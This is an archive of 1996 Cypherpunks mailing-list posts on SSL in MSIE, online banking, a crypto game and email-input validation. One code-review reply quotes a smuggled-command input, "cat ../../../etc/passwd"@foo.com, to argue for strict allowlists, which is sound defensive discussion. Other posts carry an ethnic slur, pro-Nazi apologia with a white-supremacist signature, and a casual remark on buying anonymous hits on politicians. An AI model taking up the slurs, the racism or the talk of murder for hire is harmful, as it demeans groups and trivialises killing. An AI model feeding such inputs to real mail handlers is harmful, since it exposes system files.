Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
MR/2 Tag->DOS=HIGH? I knew it was on something...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Fri, 30 Aug 1996 00:11:31 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Hayek (was: Cato Institute conference on Net-regulation)
In-Reply-To: <8a0DTD20w165w@bwalk.dm.com>
Message-ID: <199608291251.FAA28208@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! Senile tcmay@got.net (Timothy C. May) (fart) rants:
! 
! > At 4:26 AM 8/28/96, Dr.Dimitri Vulis KOTM wrote:
! > >Senile tcmay@got.net (Timothy C. May) rants:
! > >> Indeed, Hayek has had a _lot_ to do with the Cypherpunks! From "The Road t
! > >> Serfdom" to "Law, Legislation, and Liberty," his works have exerted a
! > >> profound influence on me, and on many others.
! > >
! > >But he's fucking unreadable.  I plan to teach economic this semester and
! > >make every student read Hazlitt (economics in 1 lesson). I can't force them
! > >to read hayek (or Rothbard) because they're fucking unreadable. Shit.
! >
! > Well, to one who inserts "(spit)" after nearly every name he cites, and
! > critiques Hayek as "fucking unreadable. Shit.," I suppose Hayek must indeed
! > seem unreadable. Shit.
! 
! Are you jealous, Tim )fart)? You're just a senile old fart, not worth my
! spittle. I make you feel better I'll put (fart) after you stupid name. Shit.
! 
! > After all, Hayek rarely writes things like: "The senile Von Mises (spit)
! > and his Sovok Cabal plotters...."
! 
! Senile Tim May (fart) exposes himself as a liar by attributing to me shit
! I've never said (Pidor Vorobiev's forgeries). Please stop polluting this
! mailing list with your lies and personal attacks.
! 
! > As to "forcing" your students to read Hayek, just who is in charge? If
! > you're the instructor, they can choose to read what you tell them to read,
! > or be unprepared on the exams you give and possibly flunk the class. What
! > part of "Required Reading" do you or your students not understand?
! 
! It's been many years since Tim May (spit) has been to college, hasn't it?
! I don't blackmail my students into doing the work they don't want to do
! by blackmailing them with grades. When I taught comp.sec., I said from the
! start that everyone gets an A, and I trust tgen to be motivated enough to
! read everything I _suggest_ they read. And they all did a great job and
! earn3d their A's.
! 
! Senile Tim May (fart) is a fucking statist asshole.
! 
! Fuck you and fuck your criminal Arm*nian grandparents.
! 
! ---
! 
! Dr.Dimitri Vulis KOTM
! Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 29 Aug 1996 20:46:39 +0800
To: Richard Charles Graves <cypherpunks@toad.com
Subject: Re: There is no Agent Toby Tyler at the FBI [UK Observer Story]
Message-ID: <2.2.32.19960829095805.00abc538@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:17 PM 8/28/96 -0700, Richard Charles Graves wrote:
>...two different sources, both of whom are anonymous because they work for
>competing newspapers, tell me.
>
>Could someone else with contacts/time to kill/attributability please confirm
>this?

When I first saw the name, I remembered my misspent youth:
 
Toby Tyler, or Ten Weeks with a Circus (1960)

USA 1960 Color 

Produced by: 
               Walt Disney Productions 
Genre/keyword: 
               Children's / Drama 
     Language: 
               English 
      Runtime: 
               96 

Also Known As: 
     Toby Tyler (1960) 

Directed by
      Charles Barton

Cast (in alphabetical order)
      Henry Calvin
      Kevin Corcoran  ....  Toby Tyler
      James Drury
      Gene Sheldon
      Bob Sweeney

Written by
      Lillie Hayward
      James Otis Kaler (novel) 
      Bill Walsh

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 29 Aug 1996 20:55:34 +0800
To: jim bell <cypherpunks@toad.com
Subject: Simulations
Message-ID: <2.2.32.19960829102802.00addc90@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:05 PM 8/28/96 -0800, jim bell wrote:

>To me, the most obvious one is GIGO:  Simulations, especially 
>political/social ones, might depend heavily on assumptions that are 
>programmed into them.   A trivial, yet interesting example is the computer 
>game "Sim City" which allowed you to adjust the "tax rate" but problems 
>always cropped up the further away you were from 7%.   The libertarians were 
>frustrated that we were unable to drop the tax rate and still get a 
>well-functioning, happy society.  

I was taking economics back in the Armonk Iron days and we played around with
an economic simulation program written in Fortran.  One was supposed to
adjust government spending and taxes to find an optimum level.  I set both
taxes and spending to zero.  We got a lot of economic growth and a lot of
inflation (this was not a monetarist simulation).  But we were happier.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MrAdvent@aol.com
Date: Thu, 29 Aug 1996 22:19:44 +0800
To: cypherpunks@toad.com
Subject: Desubscribe
Message-ID: <960829074816_512217624@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like you to desubscribe me from you mailing list






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 30 Aug 1996 02:54:34 +0800
To: trei@process.com
Subject: Re: MSIE cryptography
In-Reply-To: <199608291427.HAA18951@toad.com>
Message-ID: <199608291536.IAA31494@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei writes:
> 
> John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk> writes:
> 
> > Just downloaded the most recent English Version 2.1 for Windows 3.1.
> > This does appear to do the same in terms of no encryption at all after
> > the server hello.
[..]

 
> I understand that some versions of MSIE support SSL level 3. SSL3 includes a
> capability to switch 'cipher suites' in mid-session, or pick one at the start of the
> session. One of the standard cipher suites performs authentication, but not 
> encryption. This is consistant with your description.
> 
> Please ensure that the server you are connecting to is not configured for
> authenticate-only. It would be a pity to raise a big ruckus over what may be
> just a mis-configured server.

In addition, encryption isn't performed until after the ClientFinished
and ServerFinished messages, no matter which CipherSuites are negotiated.


I don't know what MSIE looks like, but I'd guess that somewhere in
it there is a screen similar to Netscape's for configuring SSL.
In Netscape you can select which CipherSuites to use, including
"No encryption with an MD5 MAC".  If you turn off the "No encryption.."
CipherSuites in MSIE, you should get an encrypted connection.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Fri, 30 Aug 1996 03:24:58 +0800
Subject: Anti-Racist Laws Stifle Political Liberty
Message-ID: <199608291601.JAA14884@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


llurch@stanford.edu (Rich Graves) writes:

> Incidentally, [don't college speech codes] belong in the past
> tense? Stanford hardly lifted a finger to defend the Grey
> Amendment, which was designed and widely regarded to be the most
> carefully tailored speech code around. I don't know of any
> universities that have tried to enact a speech code since. The
> attempt would be futile. (Background: Grey applied only to
> "fighting words" directed at individuals. It was fine, under the
> [overturned] Stanford policy [which I voted against], to create a
> "hostile environment" by screaming hostile verbiage at nobody in
> particular; but you couldn't say the same thing to someone's face.)

The mere lack of enforcement of an unjust law does not justify the 
continued extancy of that law.  That very "dead letter" law can be fired 
up at any time to harass critics of the university's anti-racist 
administration.

Some examples of dangerous dead letter laws:

* Abortion

Most people presume that abortion is legal in the USA, wrong.  
Most states make abortion very illegal, our whole abortion freedom as 
currently exists rests entirely on a few federal court decisions.  If 
the previous Supreme Court decisions are overturned, most states will 
suddenly start enforcing their fascist anti-abortion laws.

* Hate Crime

Denmark used to be presumed by racists to be the only country in Europe 
where racism was legal.  Denmark's anti-racist laws were not enforced in 
ages.  Yet, the anti-racist laws sprung into action to persecute Gerhard 
Lauck, an American Nazi who desired to move to Denmark on the account of 
a provocateur that his organization would not be harrassed in Denmark.
Mr. Lauck was deported to Germany where he was sentenced to four years in 
prison to the outrage of professional anti-racists of the "moderation" of 
his punishment for merely speaking in pro-Nazi terms in Germany, where 
politics that challenge the ruling order is strictly illegal.

* Racism In Other Countries

Racist politics are explicitly illegal in every "white country" in the 
world except, so far, the USA.  The mere lack of enforcement in many of the 
countries such as South Africa, Canada, Denmark, Russian Federation, 
Malaysia, Australia, etc., does not exonerate that country from the 
charge of censorship as political intrigue.

* "We Will Take Power"

A lot of fake anti-censorship activists insist they are for free speech 
in the sense of allowing such political purposes as "we don't like your 
policies and we want you to change," but desiring to make illegal such 
political goals as "we don't like your power and we're going to try to 
take it away from you."  Yet there is no purpose, no purpose whatsoever 
in political speech, if there is no threat allowed to the ruling order 
expressed in idealogical terms and organizational forms.  Thomas 
Jefferson, Thomas Paine and all the nationalist founders of the American 
nation would approve of radicals organizing and expressing their goals of 
seizing power legally, or if denied the means of a republic for 
succession, illegally. 

* Unfree Nations

Germany is an example of a nation that prohibits any type of Nazi 
political party.  Therefore, Germany is not a free country, not an honest 
republic, in fact, less free even than Wilhelmian Germany in allowing 
radical parties to challenge the power structure.


--
I marvel at the resilience of the white people.
Their best characteristic is their desire to learn.
No other people has such an obsession with the intellect.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 30 Aug 1996 00:11:37 +0800
To: cypherpunks@toad.com
Subject: Re: There is no Agent Toby Tyler at the FBI [UK Observer St
Message-ID: <199608291312.GAA18305@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell <frissell@panix.com> writes:
> At 03:17 PM 8/28/96 -0700, Richard Charles Graves wrote:
> >...two different sources, both of whom are anonymous because they work for
> >competing newspapers, tell me.
> >
> >Could someone else with contacts/time to kill/attributability please confirm
> >this?
> 
> When I first saw the name, I remembered my misspent youth:
> Toby Tyler, or Ten Weeks with a Circus (1960)
> USA 1960 Color 
> Produced by Walt Disney Productions 

     Which proves little (though it is suggestive). People get names for
a variety of reasons, and before 1960, there would have been little
reason *not* to use the name. Back in the 70's I remember hearing
many reports from a news announcer at the BBC World Service named
Dick Tracy.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Thu, 29 Aug 1996 23:54:33 +0800
To: Jim Gillogly <jim@ACM.ORG>
Subject: Re: A _REALLY_ Interesting Bet -[parallels]-
In-Reply-To: <199608290229.TAA10523@mycroft.rand.org>
Message-ID: <Pine.BSI.3.91.960829092057.14767A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Am I the only one who is seeing more and more parallels to Brunner's book
"The Shockwave Rider" in the world?  I thought we were getting close 
enough, but this clinches it.  Welcome to the Delphi Oracle.

Enjoy your stay.

Milie
sfuze@tiac.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 30 Aug 1996 04:37:33 +0800
To: cypherpunks@toad.com
Subject: "Undocumented Features"
Message-ID: <ae4b14ea00021004ad67@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:21 AM 8/29/96, Adamsc wrote:
>>> >looks like the DoJ have been looking around at the mirrors.. maybe to
>>> >legally hassle people about them....
>
>>> Or, just maybe, some DoJ employees wanted to see what folks on the outside
>>> were doing to tweek their bosses:-)? Reminds me of the *thousands* of hits
>>> the "Intel Secrets Page"(http://www.x86.org/) has gotten from users at
>>> intel.com
>
>Out of curiosity, has anyone used a decompiler to check if any of the
>undocumented stuff is getting used in shipping programs?

This has only marginal relevance to the list, but I'll mention in case it
helps a crypto coder out there: be wary of _ever_ using undocumented
features of a processor, compiler, or other system.

Why? Because "undocumented features" are not promises made by the vendor,
and may vanish in the next release (or, worse, change behavior in strange
and hard-to-detect ways).

We witnessed this several times at Intel with the x86 line. Various
customers discovered "undocumented features," made the mistake of
exploiting them, and then came crying to us when iterations of the
processor (what we call "steppings") took out the "features" or altered
their behavior. (And for a while there was even a rift between the Intel
versions and the NEC versions, which copied some Intel processors and
copied the undocumented features....when Intel was no longer supporting
them, the two processor families diverged, causing chaos.)

So, beware.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 30 Aug 1996 04:20:55 +0800
To: cypherpunks@toad.com
Subject: Re: MUD anyone?
Message-ID: <ae4b16e901021004256d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I second many of the comments about the difficulties in coding a reasonably
plausible game or MUD for exploring list ideas.

Just about four years ago exactly, at the first meeting of what was to
become the Cypherpunks group, we "played" the "Crypto Anarchy Game." Based
solely on paper tokens, like Monopoly, the idea was to introduce people to
concepts like digital money, anonymous remailers, information markets, and
so on. Sealed envelopes represented remailed messages, with "mixing" done
by hand.

Lots of imperfections, lots of stalls and dead ends, lots of confusion.
Protocols were imperfectly enforced, messages got lost (literally "dropped
on the floor"), and the game eventually ended in laughter, confusion, and
silliness. But it was deemed useful by most present, as it made more real
the abstractions talked about in the morning session.

Coding nearly any of the core cryptographic concepts for use in an online
game, even without a real crypto core (e.g., using other trust mechanisms)
is likely to be almost as big a job as actually coding the concepts for
real-world use. Could be very educational, and a useful dry run for later
real-world reification of concepts, but by no means easy.

I'm not trying to discourage anyone. Go for it! But it's a _big_ project.

And as Jim Bell noted, there are all sorts of costs which are not properly
accounted for. I would not, for example, expect anything interesting to
emerge out of the simulation of "assassination politics" in such a game, as
the costs, dangers, moral issues, and whatnot are not properly
accounted-for in such a MUD-type simulation. (No more so than in a fantasy
role-playing game, where characters die routinely...)

And as a last note, we had a couple of "hits" bought anonymously back then,
during the game, in '92.

(Hint: One doesn't need a Bell-style infrastructure for bidding on the
death of politicians to raise the money for a hit....many interested
parties would surely pay the $5000 (or less, say some) to buy a hit if the
risks were lowered. And to paraphrase Bell, "I know a way to lower the
risks.")

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien Lucifer <root@HellSpawn>
Date: Fri, 30 Aug 1996 01:00:39 +0800
To: cypherpunks@toad.com
Subject: List owner named in law suit (fwd)
Message-ID: <Pine.LNX.3.91.960829095059.6013A-100000@HellSpawn>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Wed, 28 Aug 1996 16:52:36 -0400 (EDT)
From: Clay Irving <clay@panix.com>
Subject: List owner named in law suit

I can't believe this one!

Peter Laws, a recent graduate of the University of Arkansas, maintains
an
electronic mailing list called "SCAN-L". The list is provided for
radio
scanning enthusiasts. There are a few hundred subscribers to the list.
Recently, in a thread about scanning publications, an employee of
publication
"A" apparently wrote something to offend someone at publication "B".
Lo and
behold, next thing you know, Peter is named in a lawsuit because he is
the
maintainer of the list.

Something seems very, very wrong with this. I've never heard of
anything 
like this before. Can a Email list maintainer be held liable for
something
someone else writes?

Peter *just* graduated, and he needs all the help he can get. Thanks,
in
advance.

-- 
Clay Irving N2VKG 
clay@panix.com
http://www.panix.com/~clay/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 30 Aug 1996 02:55:56 +0800
To: adam@homeport.org (Adam Shostack)
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608291548.KAA07041@homeport.org>
Message-ID: <199608291458.JAA28369@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Adam,

The decision that have just made is not a technical decision, it is 
a business decision. You just decided that the needs of security 
outweight the need to be able to deal with 100% of potential customers.

For example, suppose that you wrote your report for Gizmo International, 
a company that sells a variety of widgets and gadgets to users in the
world. Their current setup is that the users can visit www.gizmo.com
and ask the server to send them notifications about new products.

Based on your report's suggestions, Gizmo will have to cut off
all users with x.400 mail addresses, all UUCP users with bangs in their
addresses, all people with funky addresses provided by SPRINT, 
and so on. For example, my moderation bot received a message
from the following person:

From: /G=JAMBYL/S=KIWANIS/O=CUSTOMER/ADMD=KAZMAIL/C=KZ/@gateway.sprint.com

(my eyes just popped when I saw such address)

There are a lot of international people using this sprint gateway.

This would potentially represent a loss of s significant number of 
customers who will be bitching about gizmo.com to all their friends.
This is a bad decision from the marketing standpoint.

I see this as a compelling reason to allow all possible email addresses
to be processed correctly, even if it means that there is more work
for code proofreading. At least the management responsible for
marketing must understand and approve your email handling guidelines. A
computer programmer cannot make such decisions himself.

igor


Adam Shostack wrote:
> 
> Igor, and many others who commented on the fact that many characters
> are legal in email are correct.  However, with the exception of '-'
> and '+', I'm not sure if I'll be changing the body of the guidelines.
> My issue is that dealing with a wide variety of characters that are
> legitamate, such as "cat ../../../etc/passwd"@foo.com is more
> dangerous than only accepting the common case of user@host.net.
> 
> The number of addresses such as harvard!adam is dropping as the number
> of 'normal' addresses grows.
> 
> 
> Igor Chudov @ home wrote:
> | Adam Shostack wrote:
> | > http://www.homeport.org/~adam/review.html
> 
> | In part " V.Code (Security Issues)/3.Data Checking" you say the following:
> | 
> | `` Data coming in to Acme Widgets should be checked very carefully for
> |         appropriateness. This check should be to see if the data is what
> |         is expected (length, characters). Making a list of bad
> |         characters is not the way to go; the lists are rarely complete.
> |         A secure program should know what it expects, and reject other
> |         input. (For example, if you are looking for an email address,
> |         don't check to see if it contains a semi-colon or a newline,
> |         check to see if it contains anything other than a [A-Za-z0-9._]
> |         followed by an @, followed by a hostname [A-Za-z0-9._].)''
> | END QUOTE
> | 
> | That is not entirely correct. An email address is much more than
> | that, it can contain "!", several "@" characters (not next to each other
> | though), "%", and so on. x400 mail addresses (?) can contain "/", "=",
> | and all emails can have "+" and "-" and "_" in them. 
> | 
> | Some of the valid email addresses are
> | 
> | user_name@company.com
> | alex+@pitt.edu
> | mi%aldan.UUCP@algebra.com
> | user%host.domain@anon.penet.fi
> | host1!host2!user
> | 
> | Look at your sendmail.cf file for a humongous amount of 
> | email parsing rules.
> | 
> | Thanks for an excellent document though, I put a link to it from my
> | intranet page.
> 
> 	You're welcome.
> 
> | 	- Igor "Code Obscurity Creates Job Security" Chudov.
> | 
> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Osborne, Rick" <OSBORRI@msmail.northgrum.com>
Date: Fri, 30 Aug 1996 01:00:02 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Realtime Keyserver update
Message-ID: <3225A380@smtpmmp2.northgrum.com>
MIME-Version: 1.0
Content-Type: text/plain



First off, let me say thank you to all of those who responded to my first 
message, I gained alot of useful information.

Mark Rogaski <wendigo@pobox.com> and I have decided to write up a RFC on it 
and are going through the initial stages of deciding on its functionality. 
 We would appreciate any and all useful input on the subject.  All ideas are 
welcome.

You can email my autoresponder (at this same address) to get the latest 
information on what we've decided.  Just make the subject GET KEYSERVER INFO 
for the response.

Thank you for your interest and help.
Rick Osborne





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 30 Aug 1996 01:33:55 +0800
To: cypherpunks@toad.com
Subject: Small German bank claims first with online service
Message-ID: <2.2.32.19960829141734.00746308@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


		 
>	 FRANKFURT, Aug 28 (Reuter) - German private bank Gries &  
>Heissel Bankiers on Wednesday launched an Internet banking 
>service -- the first comprehensive service of its kind in a 
>country where online bank options are gradually taking off. 
>	 The small Berlin-based bank linked up with U.S. computer  
>firm Hewlett Packard Co to develop the system, which Internet 
>users can access using a high-security personal code. 
>	 Clients will be able to view detailed balances on their  
>deposit, current and securities accounts and transact all normal 
>banking business on the World Wide Web. 
>	 Although online banking is a developing trend on the German  
>financial services market, larger banks with far broader 
>customer bases are working on more selective Internet packages. 
>	 Thomas Gries, one of Gries & Heissel's personally-liable  
>directors, said he regarded Internet banking as a logical 
>supplement to the bank's existing services. 
>	 ``We have had an Internet home page since October 1995. This  
>move from a pure information medium to an interactive one was a 
>logical one,'' Gries said. 
>	 Banking officials attending the CEBIT electronics conference  
>in Hanover this week said German online banking business was 
>poised to grow dramatically. 
>   ``In the next six months, five to ten German banks will be on  
>the Internet,'' said Stefan Schoeller, board member at Bayerische 
>Vereinsbank AG unit Vereins- und West Bank. 
>	 Vereinsbank plans to launch Internet services within about  
>six months via its Advance Bank direct unit, pending a review of 
>security options. 
>	 Rival discount broker Direkt Anlage Bank, a unit of  
>Bayerische Hypotheken- und Wechsel Bank AG, on Tuesday launched 
>an Internet service for its securities account holders at half 
>the cost of its telephone banking service. 
>	 Meanwhile market leader Deutsche Bank AG is to test  
>electronic cash on the Internet this autumn in a joint 
>initiative with Dutch electronic payments group Digicash NV. 
>	 Vereinsbank officials at CEBIT said they planned a steady  
>expansion of the bank's online options over the coming years, 
>predicting 10 to 15 percent of its current account clients would 
>be online by the year 2000. Around 12 million Germans would rely 
>on home banking by that date, the bank predicted. 
>	 At the moment, around 3.7 percent of the bank's clients, or  
>45,000 individuals, handle their banking via PC alone, Stefan 
>Schoeller said. 
>	 Hewlett-Packard's German sales manager Michael Lindner said  
>his company, which last year helped set up the world's first 
>Internet bank, Security First Network Bank, had spoken to 
>several other German banks about some kind of Internet venture. 
>	 ``We certainly do not plan to limit our involvement to a  
>small exclusive bank,'' he said. 
>	 Lindner said there were about two million Internet users in  
>Germany and 35 million worldwide. He admitted that the amount of 
>bank business transacted on the Net -- about $200 million -- was 
>``very limited'' but predicted a dramatic rise in volume. 
>	 Vereinsbank's Schoeller said the cost advantage alone made  
>it worthwhile for customers to go online. A normal current 
>account incurred charges of 8.40 marks a month, while the same 
>account online would cost just 5.40 marks, he said. 
>	 All banks are stressing the security of the Internet.  
>  	   	
>
>
_______________________
Regards,            Boredom is the feeling that everything is a waste of time; 
                    serenity, that nothing is. -Thomas Szasz
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 30 Aug 1996 01:17:22 +0800
To: cypherpunks@toad.com
Subject: Re: MSIE cryptography
Message-ID: <199608291427.HAA18951@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk> writes:

> Just downloaded the most recent English Version 2.1 for Windows 3.1.
> This does appear to do the same in terms of no encryption at all after
> the server hello.
> 
> To be fair to Microsoft the number of cycles performed for the private key
> echange is quite high.  Therefore, not having any key and not doing the
> RSA calculations makes the access quite a bit faster.
> 
> The older versions (and some Win95 versions) that we have found around
> seem to just crash our server.  I am not really feeling like debugging that.

I understand that some versions of MSIE support SSL level 3. SSL3 includes a
capability to switch 'cipher suites' in mid-session, or pick one at the start of the
session. One of the standard cipher suites performs authentication, but not 
encryption. This is consistant with your description.

Please ensure that the server you are connecting to is not configured for
authenticate-only. It would be a pity to raise a big ruckus over what may be
just a mis-configured server.

Peter Trei
trei@process.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 30 Aug 1996 01:36:13 +0800
To: MrAdvent@aol.com
Subject: Re: Desubscribe
In-Reply-To: <960829074816_512217624@emout15.mail.aol.com>
Message-ID: <199608291436.KAA02444@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



MrAdvent@aol.com writes:
> I would like you to desubscribe me from you mailing list

I refuse.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <ben@edelweb.fr>
Date: Thu, 29 Aug 1996 21:35:17 +0800
To: cypherpunks@toad.com
Subject: Re: Real or Not ?
In-Reply-To: <Pine.SUN.3.91.960828150721.9155B-100000@eff.org>
Message-ID: <Pine.SUN.3.95.960829104532.4855z-100000@mercier.gctech.edelweb.fr>
MIME-Version: 1.0
Content-Type: text/plain


> Unless of course the program you're using to view the disassembled 
> instructions has also been altered by the TriLats. And make sure you use 
> any pre-1992 compiler on a pre-1992 operating system on a computer that's 
> not hooked up to the Net or even located where NSA agents can get to it.

For what its worth I have a copy of DOS 3.3 running Borland Turbo C 1.0
with the original Turbo Debugger/Assembler on an IBM Model 30 that has
never been hooked up to the Net.

Any takers? :)

Ben.
____
Ben Samman.................................................ben@edelweb.fr
Paris, France                      Illudium Q36 Explosive Space Modulator






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 30 Aug 1996 01:35:22 +0800
To: ichudov@algebra.com
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608271620.LAA10933@manifold.algebra.com>
Message-ID: <199608291548.KAA07041@homeport.org>
MIME-Version: 1.0
Content-Type: text


Igor, and many others who commented on the fact that many characters
are legal in email are correct.  However, with the exception of '-'
and '+', I'm not sure if I'll be changing the body of the guidelines.
My issue is that dealing with a wide variety of characters that are
legitamate, such as "cat ../../../etc/passwd"@foo.com is more
dangerous than only accepting the common case of user@host.net.

The number of addresses such as harvard!adam is dropping as the number
of 'normal' addresses grows.


Igor Chudov @ home wrote:
| Adam Shostack wrote:
| > http://www.homeport.org/~adam/review.html

| In part " V.Code (Security Issues)/3.Data Checking" you say the following:
| 
| `` Data coming in to Acme Widgets should be checked very carefully for
|         appropriateness. This check should be to see if the data is what
|         is expected (length, characters). Making a list of bad
|         characters is not the way to go; the lists are rarely complete.
|         A secure program should know what it expects, and reject other
|         input. (For example, if you are looking for an email address,
|         don't check to see if it contains a semi-colon or a newline,
|         check to see if it contains anything other than a [A-Za-z0-9._]
|         followed by an @, followed by a hostname [A-Za-z0-9._].)''
| END QUOTE
| 
| That is not entirely correct. An email address is much more than
| that, it can contain "!", several "@" characters (not next to each other
| though), "%", and so on. x400 mail addresses (?) can contain "/", "=",
| and all emails can have "+" and "-" and "_" in them. 
| 
| Some of the valid email addresses are
| 
| user_name@company.com
| alex+@pitt.edu
| mi%aldan.UUCP@algebra.com
| user%host.domain@anon.penet.fi
| host1!host2!user
| 
| Look at your sendmail.cf file for a humongous amount of 
| email parsing rules.
| 
| Thanks for an excellent document though, I put a link to it from my
| intranet page.

	You're welcome.

| 	- Igor "Code Obscurity Creates Job Security" Chudov.
| 

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 30 Aug 1996 02:23:57 +0800
To: lists@lina.inka.de (Bernd Eckenfels)
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <m0uvZT1-0004kIC@lina>
Message-ID: <199608291601.LAA07092@homeport.org>
MIME-Version: 1.0
Content-Type: text


Bernd Eckenfels wrote:

| >     Much better, look at rfc822.  (I wouldn't consider *anything* that
| > has the word "sendmail" in it a good reference).
| 
| its much better if you dont rely on the content of the string at all. Dont
| use sh -c or system and you will be save. Simply asume that all characters
| are valid in user suplied strings and treat them exactly that way... If they
| need to be exporeted then unfortunately they need to be 'untainted' and this
| should be done by positive not negative lists as mentioned in the
| guidelines.

	Not passing untainted data to system is clearly a very good
idea.

	Less clear is how much other parsing should be done.  I like
extreme parsing (when its cheap; as Marcus Watts pointed out,
verifying remote hostnames & usernames can be expensive).  If you
don't strongly verify data on the way in, it can get to other places
not so careful about its contents.  This is why I chose to recommend
against accepting a wide variety of legit email address formats;
because they will be passed back to a database that assumes that the
addresses have been sanitized, and are in user@foo.net format, and not
treat them with the care they deserve.

	In an ideal world, programmers would be careful with the data
they get, but we don't live in an ideal world.  I choose to suggest
paranoia over inclusiveness, but am adding an appendix discussing
issues of mail addressing.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 30 Aug 1996 04:21:28 +0800
To: cypherpunks@toad.com
Subject: Re: A _REALLY_ Interesting Bet [2]
Message-ID: <199608291709.LAA07068@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jim Gillogly <jim@ACM.ORG> wrote:

<snip>

>Idea Futures is dead, and the torch has passed to Foresight Exchange (FX),
>which is at http://www.ideosphere.com/ideosphere/ .  You can bet on a number
>of political issues (US and other), though not (yet) for real money.

IMO, a good cypherpunk goal would be to get that "yet" in, with Chaum's
Digicash, before the election. Perhaps Mr. Cate has some ideas in this
regard...;) When talking to lawyers one finds the justification for the
prohibition to be something like, "it would demean the process." IMNSHO,
the nest has already been soiled, and the only effect would be to kill
the unwanted phonecalls around suppertime, as I said before. The media
would eventually flock to the more-accurate poll, even if it involved
the dreaded crass freemarket capitalism of people willingly gambling.

<snip>

>This doesn't track the polls, which typically ask who the potential voter
>would vote for rather than who they think will win the election.

